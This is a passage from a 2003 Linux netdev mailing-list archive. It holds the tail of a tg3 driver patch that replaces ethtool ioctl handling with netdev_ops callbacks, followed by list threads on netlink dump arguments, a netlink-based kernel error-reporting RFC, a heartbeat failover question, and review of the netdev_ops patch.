- tg3_netif_start(tp); + return r; +} - return 0; - } - case ETHTOOL_GPAUSEPARAM: { - struct ethtool_pauseparam epause = { ETHTOOL_GPAUSEPARAM }; +static void tg3_get_ringparam(struct net_device *dev, struct ethtool_ringparam *ering) +{ + struct tg3 *tp = dev->priv; - epause.autoneg = - (tp->tg3_flags & TG3_FLAG_PAUSE_AUTONEG) != 0; - epause.rx_pause = - (tp->tg3_flags & TG3_FLAG_PAUSE_RX) != 0; - epause.tx_pause = - (tp->tg3_flags & TG3_FLAG_PAUSE_TX) != 0; - if (copy_to_user(useraddr, &epause, sizeof(epause))) - return -EFAULT; - return 0; - } - case ETHTOOL_SPAUSEPARAM: { - struct ethtool_pauseparam epause; + ering->rx_max_pending = TG3_RX_RING_SIZE - 1; + ering->rx_mini_max_pending = 0; + ering->rx_jumbo_max_pending = TG3_RX_JUMBO_RING_SIZE - 1; + + ering->rx_pending = tp->rx_pending; + ering->rx_mini_pending = 0; + ering->rx_jumbo_pending = tp->rx_jumbo_pending; + ering->tx_pending = tp->tx_pending; +} - if (copy_from_user(&epause, useraddr, sizeof(epause))) - return -EFAULT; +static int tg3_set_ringparam(struct net_device *dev, struct ethtool_ringparam *ering) +{ + struct tg3 *tp = dev->priv; - tg3_netif_stop(tp); - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); - if (epause.autoneg) - tp->tg3_flags |= TG3_FLAG_PAUSE_AUTONEG; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_AUTONEG; - if (epause.rx_pause) - tp->tg3_flags |= TG3_FLAG_PAUSE_RX; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_RX; - if (epause.tx_pause) - tp->tg3_flags |= TG3_FLAG_PAUSE_TX; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_TX; - tg3_halt(tp); - tg3_init_rings(tp); - tg3_init_hw(tp); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); - tg3_netif_start(tp); + if ((ering->rx_pending > TG3_RX_RING_SIZE - 1) || + (ering->rx_jumbo_pending > TG3_RX_JUMBO_RING_SIZE - 1) || + (ering->tx_pending > TG3_TX_RING_SIZE - 1)) + return -EINVAL; - return 0; - } - case ETHTOOL_GRXCSUM: { - struct ethtool_value edata = { ETHTOOL_GRXCSUM }; + tg3_netif_stop(tp); + spin_lock_irq(&tp->lock); + 
spin_lock(&tp->tx_lock); - edata.data = - (tp->tg3_flags & TG3_FLAG_RX_CHECKSUMS) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SRXCSUM: { - struct ethtool_value edata; + tp->rx_pending = ering->rx_pending; + tp->rx_jumbo_pending = ering->rx_jumbo_pending; + tp->tx_pending = ering->tx_pending; + + tg3_halt(tp); + tg3_init_rings(tp); + tg3_init_hw(tp); + netif_wake_queue(tp->dev); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); + tg3_netif_start(tp); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { - if (edata.data != 0) - return -EINVAL; - return 0; - } +static void tg3_get_pauseparam(struct net_device *dev, struct ethtool_pauseparam *epause) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - if (edata.data) - tp->tg3_flags |= TG3_FLAG_RX_CHECKSUMS; - else - tp->tg3_flags &= ~TG3_FLAG_RX_CHECKSUMS; - spin_unlock_irq(&tp->lock); + epause->autoneg = (tp->tg3_flags & TG3_FLAG_PAUSE_AUTONEG) != 0; + epause->rx_pause = (tp->tg3_flags & TG3_FLAG_PAUSE_RX) != 0; + epause->tx_pause = (tp->tg3_flags & TG3_FLAG_PAUSE_TX) != 0; +} - return 0; - } - case ETHTOOL_GTXCSUM: { - struct ethtool_value edata = { ETHTOOL_GTXCSUM }; +static int tg3_set_pauseparam(struct net_device *dev, struct ethtool_pauseparam *epause) +{ + struct tg3 *tp = dev->priv; - edata.data = - (tp->dev->features & NETIF_F_IP_CSUM) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_STXCSUM: { - struct ethtool_value edata; + tg3_netif_stop(tp); + spin_lock_irq(&tp->lock); + spin_lock(&tp->tx_lock); + if (epause->autoneg) + tp->tg3_flags |= TG3_FLAG_PAUSE_AUTONEG; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_AUTONEG; + if (epause->rx_pause) + tp->tg3_flags |= TG3_FLAG_PAUSE_RX; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_RX; + if (epause->tx_pause) + tp->tg3_flags |= TG3_FLAG_PAUSE_TX; + 
else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_TX; + tg3_halt(tp); + tg3_init_rings(tp); + tg3_init_hw(tp); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); + tg3_netif_start(tp); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { - if (edata.data != 0) - return -EINVAL; - return 0; - } +static u32 tg3_get_rx_csum(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + return (tp->tg3_flags & TG3_FLAG_RX_CHECKSUMS) != 0; +} - if (edata.data) - tp->dev->features |= NETIF_F_IP_CSUM; - else - tp->dev->features &= ~NETIF_F_IP_CSUM; +static int tg3_set_rx_csum(struct net_device *dev, u32 data) +{ + struct tg3 *tp = dev->priv; + if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { + if (data != 0) + return -EINVAL; return 0; } - case ETHTOOL_GSG: { - struct ethtool_value edata = { ETHTOOL_GSG }; - edata.data = - (tp->dev->features & NETIF_F_SG) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SSG: { - struct ethtool_value edata; + spin_lock_irq(&tp->lock); + if (data) + tp->tg3_flags |= TG3_FLAG_RX_CHECKSUMS; + else + tp->tg3_flags &= ~TG3_FLAG_RX_CHECKSUMS; + spin_unlock_irq(&tp->lock); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (edata.data) - tp->dev->features |= NETIF_F_SG; - else - tp->dev->features &= ~NETIF_F_SG; +static int tg3_set_tx_csum(struct net_device *dev, u32 data) +{ + struct tg3 *tp = dev->priv; + if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { + if (data != 0) + return -EINVAL; return 0; } - }; - return -EOPNOTSUPP; + if (data) + dev->features |= NETIF_F_IP_CSUM; + else + dev->features &= ~NETIF_F_IP_CSUM; + + return 0; } +static struct netdev_ops tg3_netdev_ops = { + .get_settings = tg3_get_settings, + .set_settings = tg3_set_settings, + .get_drvinfo = tg3_get_drvinfo, + .get_regs_len = tg3_get_regs_len, + .get_regs = tg3_get_regs, + .get_wol = 
tg3_get_wol, + .set_wol = tg3_set_wol, + .get_msglevel = tg3_get_msglevel, + .set_msglevel = tg3_set_msglevel, + .nway_reset = tg3_nway_reset, + .get_link = netdev_op_get_link, + .get_ringparam = tg3_get_ringparam, + .set_ringparam = tg3_set_ringparam, + .get_pauseparam = tg3_get_pauseparam, + .set_pauseparam = tg3_set_pauseparam, + .get_rx_csum = tg3_get_rx_csum, + .set_rx_csum = tg3_set_rx_csum, + .get_tx_csum = netdev_op_get_tx_csum, + .set_tx_csum = tg3_set_tx_csum, + .get_sg = netdev_op_get_sg, + .set_sg = netdev_op_set_sg, +}; + static int tg3_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) { struct mii_ioctl_data *data = (struct mii_ioctl_data *)&ifr->ifr_data; @@ -5490,8 +5399,6 @@ static int tg3_ioctl(struct net_device * int err; switch(cmd) { - case SIOCETHTOOL: - return tg3_ethtool_ioctl(dev, (void *) ifr->ifr_data); case SIOCGMIIPHY: data->phy_id = PHY_ADDR; @@ -6773,6 +6680,7 @@ static int __devinit tg3_init_one(struct tp->rx_jumbo_pending = TG3_DEF_RX_JUMBO_RING_PENDING; tp->tx_pending = TG3_DEF_TX_RING_PENDING; + dev->netdev_ops = &tg3_netdev_ops; dev->open = tg3_open; dev->stop = tg3_close; dev->get_stats = tg3_get_stats; -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" 
-- Robert Fisk From krkumar@us.ibm.com Tue Jul 8 11:44:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 11:44:51 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68Iic2x011292 for ; Tue, 8 Jul 2003 11:44:45 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h68Ihtxe237736; Tue, 8 Jul 2003 14:43:55 -0400 Received: from us.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h68IhrPw198614; Tue, 8 Jul 2003 12:43:54 -0600 Message-ID: <3F0B10E3.9050700@us.ibm.com> Date: Tue, 08 Jul 2003 11:43:47 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" , kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Question about netlink Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3831 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev Hi, Some of the netlink routines (eg rtnetlink_dump_ifinfo or inet6_dump_ifaddr) seem to get user arguments from cb->args['n']. However I was not able to figure out where the arguments are being set, can anyone help ? netlink_dump_start() is where the cb gets allocated (initialized to 0), and that calls netlink_dump(), which calls the assigned routine. I couldn't find where the args gets initialized to user provided values. Any pointer to what to look for is very much appreciated. 
Thanks, - KK From yoshfuji@linux-ipv6.org Tue Jul 8 12:03:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 12:03:24 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68J3I2x011727 for ; Tue, 8 Jul 2003 12:03:19 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h68J4YBo018135; Wed, 9 Jul 2003 04:04:34 +0900 Date: Wed, 09 Jul 2003 04:04:33 +0900 (JST) Message-Id: <20030709.040433.89038276.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: davem@redhat.com, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Re: Question about netlink From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <3F0B10E3.9050700@us.ibm.com> References: <3F0B10E3.9050700@us.ibm.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3832 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <3F0B10E3.9050700@us.ibm.com> (at Tue, 08 Jul 2003 11:43:47 -0700), Krishna Kumar says: > Some of the netlink routines (eg rtnetlink_dump_ifinfo or inet6_dump_ifaddr) seem to get > user arguments from cb->args['n']. However I was not able to figure out where the > arguments are being set, can anyone help ? 
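For what it's worth, here is a minimal userspace sketch of the pattern those dump routines follow, as far as I can tell: cb->args[] is not filled in from user input at all. netlink_dump_start() leaves it zeroed, and each dump callback uses it as a private cursor, storing where it stopped so that the next pass can resume from there. The names below (struct dump_cb, dump_items, dump_all, NUM_ITEMS) are hypothetical stand-ins for illustration, not kernel symbols.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical stand-in for struct netlink_callback: only the
 * per-dump scratch area is modelled here. */
struct dump_cb {
	long args[4];
};

/* Illustrative table length; stands in for walking the device list. */
#define NUM_ITEMS 10

/*
 * One dump pass. Emits at most `room` item indices into out[] and
 * returns how many were emitted (0 means the dump is finished).
 */
static int dump_items(int *out, int room, struct dump_cb *cb)
{
	int s_idx = (int)cb->args[0];	/* where the previous pass stopped */
	int idx, n = 0;

	assert(room > 0);
	for (idx = 0; idx < NUM_ITEMS; idx++) {
		if (idx < s_idx)
			continue;	/* already reported by an earlier pass */
		if (n == room)
			break;		/* buffer full, resume here next time */
		out[n++] = idx;
	}
	cb->args[0] = idx;		/* remember the resume point */
	return n;
}

/* Drive the dump to completion; returns items seen and counts the
 * passes that produced output. */
static int dump_all(int room, int *passes)
{
	struct dump_cb cb;
	int buf[NUM_ITEMS];
	int total = 0, n;

	memset(&cb, 0, sizeof(cb));	/* args start out as zero */
	*passes = 0;
	while ((n = dump_items(buf, room, &cb)) > 0) {
		total += n;
		(*passes)++;
	}
	return total;
}
```

Calling dump_all(3, &passes) walks all ten items in four passes of at most three items each. The kernel routines do the same thing, with remaining skb space playing the role of `room`.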
Take a look at
  net/core/rtnetlink.c:rtnetlink_dump_ifinfo()
  net/core/neighbour.c:neigh_dump_{info,table}()
and seek the truth. :-)

--yoshfuji

From jkenisto@us.ibm.com Tue Jul 8 12:47:27 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 12:47:38 -0700 (PDT)
Received: from e5.ny.us.ibm.com (e5.ny.us.ibm.com [32.97.182.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68JlJ2x012263 for ; Tue, 8 Jul 2003 12:47:26 -0700
Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e5.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h68Jl5td166330; Tue, 8 Jul 2003 15:47:05 -0400
Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h68Jl3nn037252; Tue, 8 Jul 2003 15:47:04 -0400
Message-ID: <3F0B1F56.D863F212@us.ibm.com>
Date: Tue, 08 Jul 2003 12:45:26 -0700
From: Jim Keniston
X-Mailer: Mozilla 4.75 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Andrew Morton
CC: linux-kernel@vger.kernel.org, netdev@oss.sgi.com, davem@redhat.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org
Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting
References: <3F0AFFE6.E85FF283@us.ibm.com> <20030708105912.57015026.akpm@osdl.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-archive-position: 3833
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jkenisto@us.ibm.com
Precedence: bulk
X-list: netdev

If you're going to reply to this, please change "netdev@oss.sgi.net" to
"netdev@oss.sgi.com" in your cc list. My apologies for the error.
Jim From jkenisto@us.ibm.com Tue Jul 8 13:01:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 13:01:38 -0700 (PDT) Received: from e6.ny.us.ibm.com (e6.ny.us.ibm.com [32.97.182.106]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68K1O2x013039 for ; Tue, 8 Jul 2003 13:01:32 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e6.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h68K1Ixr171370 for ; Tue, 8 Jul 2003 16:01:19 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h68K1Ho1066990 for ; Tue, 8 Jul 2003 16:01:18 -0400 Message-ID: <3F0B22AC.1D600F98@us.ibm.com> Date: Tue, 08 Jul 2003 12:59:40 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: netdev Subject: [PATCH - RFC] 2.6 must-fix list - kernel error reporting Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3834 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev I posted this today on LKML. I intended to post to netdev as well, but botched the address. For the actual patches, see the LKML thread, or the indicated links. *Sigh.* Jim Keniston IBM Linux Technology Center ----- Andrew Morton's 2.6 must-fix list includes the following item: > o We need a kernel side API for reporting error events to userspace (could > be async to 2.6 itself) > > (Prototype core based on netlink exists) The enclosed patches provide a mechanism for reporting error events to user-mode applications via netlink. This mechanism supplements the text-oriented printk mechanism, providing a way to log binary data or a mixture of text+binary. Patch #1, closely based on a prototype by Dave Miller, implements the NETLINK_KERROR protocol for AF_NETLINK sockets. 
It provides two functions for broadcasting data packets to user-mode applications: in one, the caller provides a single data buffer, and in the other, the caller provides an iovec[]. Patch #2 (see accompanying post) provides an API built on patch #1's infrastructure. Patch #2's functions capture context about the error (e.g., driver/module, severity level, in interrupt or not, pid/uid/gid, CPU ID), pack this information into a header, add the error-specific data, and send the resulting packet via netlink. The two principal functions are: - evl_write(), which accepts an arbitrarily defined buffer of error-specific data; and - evl_printf(), which accepts a format string plus args, printk-style. Rather than combining the format and args, evl_printf() keeps them separate, as various developers have suggested. Thus the receiving application can easily determine both the type of error (as indicated by the raw format string) and the args' values, without parsing the message string. Applications that respond to kernel errors can establish AF_NETLINK/NETLINK_KERROR sockets and receive the error packets directly; or they can register with an event subsystem (e.g., see evlog.sourceforge.net), which will deliver events that match specific criteria. These patches are posted on evlog.sourceforge.net. (Click on "Latest Release"; then scroll down to "evlog-2.5_kernel/evlog + netlink". Or just follow the links posted below.) Also posted there is a tar file, kerrord.tar.gz, which contains: - a sample module that logs errors using evl_write() and evl_printf(); and - a sample daemon that reads such errors from netlink and logs them. 
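
The point about evl_printf() keeping the format string and the args separate can be illustrated with a small user-space sketch. Everything in it is an assumption made for illustration: the record layout, the names pack_record(), record_format() and record_arg(), and the restriction to 32-bit integer args are hypothetical and are not the evlog wire format or API.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical record layout (NOT the evlog format):
 *   uint32_t nargs | NUL-terminated format string | nargs * int32_t
 * The format string is stored raw, so a receiver can match on it
 * without parsing an already-formatted message.
 */

/* Pack a record into buf; returns bytes used, or 0 if it does not fit. */
size_t pack_record(unsigned char *buf, size_t cap, const char *fmt,
                   const int32_t *args, uint32_t nargs)
{
    size_t fmt_len = strlen(fmt) + 1;   /* include the NUL */
    size_t need = sizeof(nargs) + fmt_len + (size_t)nargs * sizeof(int32_t);

    if (need > cap)
        return 0;
    memcpy(buf, &nargs, sizeof(nargs));
    memcpy(buf + sizeof(nargs), fmt, fmt_len);
    if (nargs)
        memcpy(buf + sizeof(nargs) + fmt_len, args,
               (size_t)nargs * sizeof(int32_t));
    return need;
}

/* The raw format string identifies the type of error. */
const char *record_format(const unsigned char *buf)
{
    return (const char *)(buf + sizeof(uint32_t));
}

/* Fetch argument i without touching the format string; 0 if out of range. */
int32_t record_arg(const unsigned char *buf, uint32_t i)
{
    uint32_t nargs;
    int32_t value;
    const unsigned char *args;

    memcpy(&nargs, buf, sizeof(nargs));
    if (i >= nargs)
        return 0;
    args = buf + sizeof(nargs) + strlen(record_format(buf)) + 1;
    memcpy(&value, args + (size_t)i * sizeof(int32_t), sizeof(value));
    return value;
}
```

A receiver written against such a layout could compare record_format() with a known string such as "eth%d: error %d" and then read the values with record_arg(), which is the property the description above is after.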
Jim Keniston
IBM Linux Technology Center

http://prdownloads.sourceforge.net/evlog/kerror-2.5.74.patch?download
http://prdownloads.sourceforge.net/evlog/evlog-2.5.74.patch?download
http://prdownloads.sourceforge.net/evlog/kerrord.tar.gz?download

From bob.olszewski@cmstk.com Tue Jul 8 13:05:35 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 13:05:39 -0700 (PDT)
Received: from corp148mr2.mcgraw-hill.com (corp148mr2.mcgraw-hill.com [198.45.18.163]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68K5U2x013399 for ; Tue, 8 Jul 2003 13:05:35 -0700
Received: by corp148mr2.mcgraw-hill.com (Switch-3.0.4/Switch-3.0.0) with SMTP id h68K43ee023114 for ; Tue, 8 Jul 2003 16:04:04 -0400 (EDT)
X-Lotus-FromDomain: SPC
From: bob.olszewski@cmstk.com
To: netdev@oss.sgi.com
Message-ID: <85256D5D.006E5858.00@spchar2.spcomstock.com>
Date: Tue, 8 Jul 2003 16:05:17 -0400
Mime-Version: 1.0
Content-type: multipart/mixed; Boundary="0__=AsfbwQBSZ3ABPOlMYzrAmVy5BJLvMN0BWIEaZcE1AN429kY1IRvNzRqx"
Content-Disposition: inline
X-archive-position: 3835
Subject: (no subject)
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: bob.olszewski@cmstk.com
Precedence: bulk
X-list: netdev

--0__=AsfbwQBSZ3ABPOlMYzrAmVy5BJLvMN0BWIEaZcE1AN429kY1IRvNzRqx
Content-type: text/plain; charset=us-ascii
Content-Disposition: inline

Hi,

I caught your name on a site and was wondering if you had any advice on
this scenario. I'm running HA on a multi-networked server; one interface (eth1)

--0__=AsfbwQBSZ3ABPOlMYzrAmVy5BJLvMN0BWIEaZcE1AN429kY1IRvNzRqx
Content-type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-transfer-encoding: quoted-printable

is a member of the HA group that customers connect to, the other (eth0) is
where it gets its feed from (not running HA). The problem I have is that if
the feed source interface (eth0) goes down, the server cannot deliver data.
I cannot run eth0 in HA; our app. on the feed source side allows only one
connection.

Is there any way to configure heartbeat to recognize that a non-HA'd
interface has gone down, and to make the interface that "is" in an HA group
fail over?

--0__=AsfbwQBSZ3ABPOlMYzrAmVy5BJLvMN0BWIEaZcE1AN429kY1IRvNzRqx--

From krkumar@us.ibm.com Tue Jul 8 13:29:02 2003
Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 13:29:09 -0700 (PDT)
Received: from e34.co.us.ibm.com (e34.co.us.ibm.com [32.97.110.132]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68KSq2x027846 for ; Tue, 8 Jul 2003 13:29:01 -0700
Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e34.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h68KS1DG285948; Tue, 8 Jul 2003 16:28:01 -0400
Received: from us.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h68KRxPw018890; Tue, 8 Jul 2003 14:28:00 -0600
Message-ID: <3F0B294A.9060302@us.ibm.com>
Date: Tue, 08 Jul 2003 13:27:54 -0700
From: Krishna Kumar
Organization: IBM
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: yoshfuji@linux-ipv6.org
CC: davem@redhat.com, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com
Subject: Re: Question about netlink
References: <3F0B10E3.9050700@us.ibm.com> <20030709.040433.89038276.yoshfuji@linux-ipv6.org>
In-Reply-To: <20030709.040433.89038276.yoshfuji@linux-ipv6.org>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-archive-position: 3836
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: krkumar@us.ibm.com
Precedence: bulk
X-list: netdev

I am still not convinced how it works, though I have been trying to seek
the truth for some time now :-). These routines 'get' the value of args[0]
and then 'set' it to the resultant value.
How is this value set in the first place to the user provided value ? It seems to be initialized to ZERO in netlink_dump_start(). The only way it seems to use the value is if it gets called twice from netlink_dump(), the first time cb->args will be set to zero's while the second time it will have the values set by the first invocation to the same routine. Am I missing something or is 'args' not intended for user specified arguments ? If so, how should we access the arguments passed by the user ? Thanks, - KK YOSHIFUJI Hideaki wrote: > In article <3F0B10E3.9050700@us.ibm.com> (at Tue, 08 Jul 2003 11:43:47 -0700), Krishna Kumar says: > > >>Some of the netlink routines (eg rtnetlink_dump_ifinfo or inet6_dump_ifaddr) seem to get >>user arguments from cb->args['n']. However I was not able to figure out where the >>arguments are being set, can anyone help ? > > > Take a look at net/core/rtnelink.c:rtnetlink_dump_ifinfo() > net/core/neighbour.c:neigh_dump_{info,table}() > and seek the truth. :-) > > --yoshfuji > From greearb@candelatech.com Tue Jul 8 13:44:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 13:44:51 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68Kij2x028272 for ; Tue, 8 Jul 2003 13:44:46 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h68KiWKk015548; Tue, 8 Jul 2003 13:44:35 -0700 Message-ID: <3F0B2D30.4020102@candelatech.com> Date: Tue, 08 Jul 2003 13:44:32 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Matthew Wilcox CC: netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> In-Reply-To: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> Content-Type: 
text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3837 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Matthew Wilcox wrote: > After a conversation with acme, I realised that ethtool_ops is far too > narrow scope. What we need are netdev_ops. This patch renames the > ethtool_ops to netdev_ops and fixes some other minor flaws: > > - add _len() ops for operations which previously had to kmalloc their > own memory. > - move the netdev_ops from ethtool.h to netdevice.h > - makes some ops generic as requested by Jeff Garzik. > > I think netdev_ops is still a little too ethtool-specific; something > I'd like to do is convert the parameters to be a little less > ethtool-related. For example, instead of ->get_drvinfo, I'd like to > see ethtool_get_drvinfo() call several methods and fill in all the data > that way. > > But let's see what everyone thinks of this patch first ... > > + * Each operation is passed a &struct net_device as its first parameter. Some of these are missing their netdevice arg? 
> + int (*get_regs_len)(struct ethtool_regs *); > + int (*self_test_len)(struct ethtool_test *); > + int (*get_strings_len)(struct ethtool_gstrings *); > + int (*get_stats_len)(struct ethtool_stats *); -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From willy@www.linux.org.uk Tue Jul 8 14:25:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 14:25:59 -0700 (PDT) Received: from www.linux.org.uk (IDENT:ZMJsD5p6cj1AQQe+eOWA9Gi94DMngJxa@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68LPq2x002552 for ; Tue, 8 Jul 2003 14:25:53 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19ZzyB-0006GR-Cf; Tue, 08 Jul 2003 22:25:51 +0100 Date: Tue, 8 Jul 2003 22:25:51 +0100 From: Matthew Wilcox To: Ben Greear Cc: Matthew Wilcox , netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops Message-ID: <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0B2D30.4020102@candelatech.com> User-Agent: Mutt/1.4.1i X-archive-position: 3838 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: 